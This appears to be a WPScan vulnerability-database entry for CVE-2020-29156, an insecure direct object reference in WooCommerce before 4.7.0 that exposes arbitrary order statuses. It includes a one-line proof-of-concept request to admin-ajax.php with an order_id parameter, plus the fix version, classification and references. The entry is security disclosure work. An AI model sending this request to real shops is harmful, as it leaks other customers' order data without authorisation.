logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

WooCommerce < 4.7.0 - Arbitrary Order Status Disclosure via IDOR

Description

"The WooCommerce plugin before 4.7.0 for WordPress allows remote attackers to view the status of arbitrary orders via the order_id parameter in a fetch_order_status action."

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=fetch_order_status&order_id=XX

Affects Plugins

woocommerce

Fixed in version 4.7.0

References

CVE

CVE-2020-29156

URL

https://github.com/Ko-kn3t/CVE-2020-29156

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

Miscellaneous

Original Researcher

Ko-kn3t

Verified

No

WPVDB ID

c420f079-5803-47ec-9844-28b0785c35f0

Timeline

Publicly Published

2020-12-28 (about 10 months ago)

Added

2021-02-22 (about 8 months ago)

Last Updated

2021-02-23 (about 8 months ago)

Our Other Services

WPScan WordPress Security Plugin